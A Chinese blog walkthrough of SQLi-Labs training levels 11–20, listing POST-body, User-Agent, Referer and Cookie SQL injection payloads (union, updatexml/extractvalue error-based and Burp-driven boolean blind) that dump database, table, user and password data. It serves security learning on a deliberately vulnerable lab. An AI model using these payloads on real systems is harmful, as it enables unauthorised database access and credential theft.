【SQLI-Lab】-Less11-20

最新推荐文章于 2024-04-20 11:30:00 发布
最新推荐文章于 2024-04-20 11:30:00 发布
阅读量230 收藏 1
点赞数 3
分类专栏: sqli 漏洞注入通关宝典 文章标签: 网络安全 安全漏洞 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xinyue9966/article/details/113446463
版权

Basic Challenges

前言

注入攻击的本质,是把用户输入的数据内容当做代码执行。POST注入会比GET型注入少加密一层,不过对于靶场和实战更喜欢POST传值,传输更易懂!

Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)

 uname=Dumb'&passwd=Dumb&submit=Submit
 uname=Dumb' and 1=1 -- 1&passwd=Dumb&submit=Submit
 uname=Dumb' and 1=2 -- 1&passwd=Dumb&submit=Submit
 uname=Dumb' group by 2 -- 1&passwd=Dumb&submit=Submit
 uname=-Dumb' union select database(),2 -- 1&passwd=Dumb&submit=Submit
 uname=-Dumb' union select group_concat(table_name),2 from information_schema.tables where table_schema=database() -- 1&passwd=Dumb&submit=Submit
 uname=-Dumb' union select group_concat(column_name),2 from information_schema.columns where table_name='users' -- 1&passwd=Dumb&submit=Submit
 uname=-Dumb' union select group_concat(username),2 from security.users -- 1&passwd=Dumb&submit=Submit

在这里插入图片描述

Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)

与11关思路相同,同理将11题闭合号’换成",即可。
在这里插入图片描述

Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

与11关思路相同,同理将11题闭合号’换成’),即可。
在这里插入图片描述

Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

没太想懂这题为什么叫单引号变形,变形成了双引号?至于为什么是",我们是试出来的,’,",),’),"),’’),""),’)),"))都有可能,靶场只要你敢使,不怕出不来,出不来就换个思路吧,它不回显也没办法不是。这道select就回显不了,我们就使用了报错注入。注:0x7e是16进制的~符号。

uname=Dumb" group by 1,2 and " &passwd=Dumb&submit=Submit
uname=Dumb" and updatexml(1,concat(0x7e,database(),0x7e),1) and " &passwd=Dumb&submit=Submit
uname=Dumb" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and " &passwd=Dumb&submit=Submit
uname=Dumb" and updatexml(1,concat(0x7e,(select group_concat(`username`) from security.users),0x7e),1) and " &passwd=Dumb&submit=Submit

如果没看懂为什么用and “,这里涉及到了一个万能公式,’ 'or ‘1’ = ‘1’ # ',左右两边的是系统内写入的,我们负责闭合,此时没有井号做注释,所以形式为” "and “1”="1 ",and与or在此时同一作用。
在这里插入图片描述

less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)

开始正常通过报错回显闭合等信息,使用报错注入,这里面burp suite使用请参考7-10关,有详细的教程,包看懂喔!同时这关可以使用时间延迟方法。

uname=Dumb' and 1=1 -- 1 &passwd=Dumb&submit=Submit
uname=Dumb' and 1=2 -- 1 &passwd=Dumb&submit=Submit
uname=Dumb' group by 2 -- 1 &passwd=Dumb&submit=Submit
uname=Dumb' and length(database())=8 -- 1 &passwd=Dumb&submit=Submit
uname=Dumb' and ascii(substr(database(),§1§,1))=§97§ -- 1 &passwd=Dumb&submit=Submit
uname=Dumb' and (select length(table_name) from information_schema.tables where table_schema=database() limit 3,1)=§3§ -- 1 &passwd=Dumb&submit=Submit
uname=Dumb' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),§1§,1))=§3§ -- 1 &passwd=Dumb&submit=Submit
uname=Dumb' and ascii(substr((select username from security.users limit 0,1),§1§,1))=§3§ -- 1 &passwd=Dumb&submit=Submit

在这里插入图片描述

Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注)

和15关思路相同,将’换成")即可。
在这里插入图片描述

Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)

和前两关没差别,只是在最后写即可,当然可能有些题可能在前面注入,所以注入点不同则另判断。

uname=Dumb&passwd=Dumb'&submit=Submit
uname=Dumb&passwd=Dumb' and updatexml(1,concat(0x7e,database(),0x7e),1) -- 1&submit=Submit
uname=Dumb&passwd=Dumb' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) -- 1&submit=Submit
uname=Dumb&passwd=Dumb' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) -- 1&submit=Submit
uname=Dumb&passwd=Dumb' and updatexml(1,concat(0x7e,(select password from (select password from users limit 7,1) test ),0x7e),1) -- 1&submit=Submit

在这里插入图片描述

Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)

使用了万能密码,和14关的使用思路相同,通过burp来完成http头部修改,extractvalue和updatexml差别就是内置参数不同,updatexml是三个,extractvalue是两个。

User-Agent: 'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '

在这里插入图片描述

Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

这关是修改了Referer值,和18关思路相同,同样抓取http头部包修改即可。

Referer: 'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '

在这里插入图片描述

Less-20 POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)

这关是修改了Cookie值,和18关思路相同,同样抓取http头部包修改即可。

Cookie: uname=-admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1'='1

总结

完成了我想要的基础效果,通过开始1-10关的每一步认真教学,到现在整体型传输思维,推荐工具,使用函数的差别,都做了认真的思考怎么样去传输,包括特殊字符的注释说明,在目前算是完成了心里的预期目标,至此,SQLI-Lab基础篇即结束。进阶篇发布待定。喜欢的朋友不要吝啬一个赞喔!

幸运之河
关注
专栏目录
SQLi-LABS】Less -11 注入思路以及过程
m0_52513952的博客
02-22 3211
less 11sqli-labs 的第一道 POST 型注入题,因此,我们不能再用之前 GET 型注入的方法,在搜索框进行注入,而是要在输入框里面完成注入。下面的注入流程是基于nliuc师傅的视频教程实现的。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1445
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs教程——Less 11-20
Lilin's博客
01-21 1373
sqli-labs教程——Less 11-20 Page-1 Basic Challenges准备工具Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)1. 判断是否有注入点2. 判断闭合字符3. 判断当前页面中SQL语句的查询列数4. 判断数据在页面中回显位置和SQL语句中回显位5. 判断当前页面连接的数据库名称6. 显示security数据库中所有表名称信息7. 判断users表的列名称信息8. 查询users表
sqli-labs (less-11)
kukudeshuo的博客
03-09 2828
sqli-labs (less-11) 补充知识 从第11关开始我们发现跟以前的页面已经完全不一样了,这里要我们输入用户名和密码 假设我们现在注册了一个账号,账号为admin,密码为admin,我们登入进去看看 登入进去之后我们发现屏幕上回显了我们输入的账号和密码,但是url那里却没有返回我们输入的账号和密码,因为前面的关卡我们输入的内容都是以GET方式传输到了服务端,而这里我们输入的账号密码是以POST的方法传输到了服务端 GET请求和POST请求的区别 GET请求: GET方法用于获取请求页面的指定
sqli-labs(less-11)
不知名白帽的博客
07-17 697
sqli-labs(less-11)。less-11(POST注入)
SQLi LABS Less-12 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-21 1万+
sqli第十二关,sqli-labs less-12,sqlilabs less12
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1924
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1263
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1098
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
Sqli-lab教程-史上最全详解(1-22通关)
最新发布
wangluoanquan111的博客
04-20 836
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
Sqli-labs之Less-11和Less-12
→_→
04-02 1766
Less-11 POST - 基于错误的- 单引号- 字符型 LOGIN ATTEMPT FAILED 登录尝试失败 从这一关的提示当中我们知道这是一个post类型的,那么post与ge...
[靶场] SQLi-Labs Less11-Less20
3hex的博客
09-23 224
提供主要的语句,略去探测数据库名,表名,字段名的步骤。 11.Less11 请求方式 注入方式 类型 备注 POST 基于报错注入(Union内联注入) 字符型 单引号闭合 1. 正常提交 uname=1&passwd=2 2. 语句报错 uname=1'&passwd=2 uname=1'3&passwd=2 uname=1'3"&passwd=2 3. 执行注入的SQL uname=1' or 1 %23&.
sqli-labs-master通关之LESS11-LESS16
weixin_43726831的博客
10-10 602
SQL注入之sqli-labs-master LESS11-LESS16 less11-16关中,是最基本的POST交互方式下的注入 包括联合查询法,报错型注入,以及布尔型盲注,在此博文中,对其详细过程没有做记录,但是万变不离其宗,这是建立在GET交互方式之上的,所以其方法同GET交互方式下的查询方法类似 联合查询法 报错型注入 布尔型盲注 时间性盲注 LESS-1111关 1.通过WEB页面...
生命在于折腾——SQL注入的实操(三)less11-15
易水哲的博客
08-20 625
本篇文章是sql-lib的11-15关。
SQLi-LABS的Less11-20分析
haoahaoahaoahao的博客
02-26 823
试试在username输入1或者1'或者1')或者1'))或者1"或者1")或者1"))那么password为空,发现输入1'或者1')或者1'))的时候会报错,那么通过Less12文章的order by命令发现输入1')的时候是能注入的,不过爆数据库uname=-1') union select 1,database()#&passwd=&submit=Submit的情况和Less12不一样,虽然登录成功却没显示。id=1'会怎么样呢,那么试一下看看发生什么。
sqli-labs练习(十四)--- POST-Double Injection-Single quotes-String-with twist
wkend的博客
07-26 467
这一关与上一关很相似,唯一的区别就在于是采用双引号来闭合的, 直接可以用万能密码成功登录,比如123" or 1=1# 在获取数据库信息是把')替换为"即可。 payload:uname=123" union select count(*),concat(':',(select database()),':',floor(rand()*2))as a from information_s...
Sqli-labs Less-3 Error Based- String (with Twist)
04-15 304
首先还是看网页提示输入id测试,输入id后加单引号看有什么输出。 payload /sql/Less-3/?id=1' 可以看到报错,报错在1后面有一个括号,换一个payload试一下。 payload /sql/Less-3/?id=1') --+ 可以看到可以正常显示内容。 接下来确定回显位置。 /sql/Less-3/?id=-1') union select 1,2,3--+ 可以看到回显位置为2和3的位置,这里要注意id要设置为-1才能够看到回显位置,因为id为-1
sqli-labs第十三关--十五关
小人物的博客
06-18 3288
第十三关 Double Injection- String- with twist(双注入 - 字符型 - 变形) 看一看它的源代码 POST传值没有任何过滤,@不显示输出,echo $sql;这个语句是我加的,为了显示再输入框中的语句是如何显示的 直接闭合,用户名和密码输入“ ‘) or (‘1’) = (‘1%23 ” 双引号里面的语句,前面的单引号加括号和sql中的括号单引号闭合,...
SQLI-LABS Less-11 到 Less-12
Web学习之路
03-22 264
联合注入
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值